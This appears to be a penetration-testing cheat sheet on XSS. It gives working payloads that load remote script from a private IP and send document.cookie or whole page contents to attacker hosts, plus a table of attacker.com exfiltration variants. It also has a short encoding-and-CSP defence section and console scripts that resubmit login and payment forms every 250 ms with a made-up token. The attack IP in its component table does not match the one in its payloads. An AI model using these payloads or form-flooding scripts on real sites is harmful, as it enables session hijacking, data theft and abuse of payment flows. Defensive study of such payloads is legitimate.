Client Side Attacks
XSS
Professional Explanation of Payload
```html
<script src="http://192.168.155.224:80/test.txt"></script>
```

```html
<script>var i=new Image();i.src="http://192.168.155.224:80/?c="+document["coo"+"kie"]</script>
```
Step-by-Step Breakdown
1. Payload Nature
This is a client-side injection payload, specifically JavaScript, typically used in:
Stored XSS (Cross-Site Scripting)
Reflected XSS
DOM-based XSS
Its goal is to force the vulnerable application to import and execute external JavaScript code controlled by the attacker.
2. Component Analysis
| Component | Description |
|---|---|
| `<script src="..."></script>` | Loads external JavaScript from a specified URL. |
| `http://10.21.86.228:80/test.txt` | Attacker-controlled server hosting test.txt. |
| `.txt` extension | Irrelevant to the browser: if the content is valid JavaScript, the browser executes it regardless of file extension. |
Note: Despite being named .txt, if the server returns JavaScript with the correct Content-Type or valid syntax, browsers will execute it. The one defender-side exception is a response served with a non-JavaScript Content-Type together with `X-Content-Type-Options: nosniff`, which makes the browser refuse to run it as a script.
3. Real-World Application
Exploitation Context:
If an application reflects unsanitized user input into HTML/JavaScript, this payload will:
Establish an out-of-band (OOB) connection to 10.21.86.228.
Download and execute any JavaScript hosted in test.txt.
Common in CTFs, Red Team operations, bug bounty, or penetration tests to:
Exfiltrate cookies or session tokens.
Manipulate DOM elements.
Deploy keyloggers or redirect victims.
Escalate from Stored/Reflected XSS to full session hijacking or command execution.
```javascript
// Fetch the current page (authenticated as the victim) and send its
// base64-encoded body to the attacker-controlled host.
async function exfil() {
  const response = await fetch('/');
  const text = await response.text();
  await fetch(`http://<kali ip>/?data=${btoa(text)}`);
}
exfil();
```
4. Security Implications
If this executes:
Indicates XSS vulnerability, enabling:
Theft of cookies, JWT tokens, CSRF tokens.
Unauthorized actions on behalf of the victim.
Browser exploitation via advanced payloads.
If the vulnerable system is internal and the attacker’s IP (10.21.86.228) is reachable:
Facilitates internal network pivoting.
Allows payload staging for lateral movement.
5. Additional Payload Variations
| Payload Example | Purpose |
|---|---|
| `<script src="http://attacker.com/payload.js"></script>` | Load remote JavaScript |
| `<img src=x onerror="location='http://attacker.com/?c='+document.cookie">` | Exfiltrate cookies |
| `<script>fetch('http://attacker.com?'+document.cookie)</script>` | Direct data exfiltration via fetch |
| `<iframe src="http://attacker.com"></iframe>` | Hidden malicious iframe injection |
Conclusion
This payload is a textbook example of leveraging external script inclusion for malicious purposes during XSS exploitation. It’s essential for defenders to implement:
Proper output encoding.
CSP (Content Security Policy) restrictions.
Strict input validation.
For attackers, this is an efficient, low-resource method to escalate client-side vulnerabilities into actionable control over victim sessions or browsers.
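As an added example of the two defences named above (not code from the original page), here is a server-side rendering helper in JavaScript that HTML-encodes untrusted input before placing it in a text context and emits a Content-Security-Policy header that refuses the remote script and the fetch()/Image() exfiltration channels even if encoding were missed. The function names and the comment-rendering template are assumptions for illustration.

```javascript
// HTML entity encoding for untrusted data inserted into an HTML text context.
// After encoding, the payloads on this page are displayed literally, not parsed.
function encodeForHtml(input) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(input).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Build a Content-Security-Policy header value. script-src limited to 'self'
// plus a per-response nonce means <script src="http://192.168.155.224/test.txt">
// and unnonced inline <script> blocks are refused by the browser; img-src and
// connect-src limited to 'self' break the Image() and fetch() exfiltration
// channels; frame-src 'none' blocks the hidden iframe variant.
function buildCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "img-src 'self'",
    "connect-src 'self'",
    "frame-src 'none'",
    "object-src 'none'",
    "base-uri 'self'",
  ].join('; ');
}

// Hypothetical template: render an untrusted comment into a page fragment and
// return it together with the response headers the page should be served with.
function renderComment(comment, nonce) {
  const html = `<div class="comment">${encodeForHtml(comment)}</div>`;
  return { html, headers: { 'Content-Security-Policy': buildCsp(nonce) } };
}

// Constructed sample: the first payload from this page submitted as user input.
const samplePayload = '<script src="http://192.168.155.224:80/test.txt"></script>';
const rendered = renderComment(samplePayload, 'r4nd0mN0nc3');
console.log(rendered.html);
console.log(rendered.headers['Content-Security-Policy']);
```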
Extra
If the application does not validate whether a submission has already been received, you can try this directly from the browser's console:
```javascript
// Re-submit the login form every 250 ms while the form is present on the page.
function submitForm(){
  if (document.getElementById('scroll-form')) {
    document.getElementById('email').value = 'mail@mail.tz';
    document.getElementById('logInBtn').click();
  }
}
setInterval(submitForm, 250)
```
```javascript
function submitForm(){
  // Fill in the hidden token field (normally generated by the system itself)
  const tokenField = document.getElementById('token');
  if (tokenField) {
    tokenField.value = 'tok_1234567890abcdef'; // made-up token
  }
  // Submit the form
  const form = document.getElementById('payment_form');
  if (form) {
    form.submit();
  }
}
setInterval(submitForm, 250)
```
The 250 is the interval in milliseconds (a quarter of a second); change it to whatever interval you want.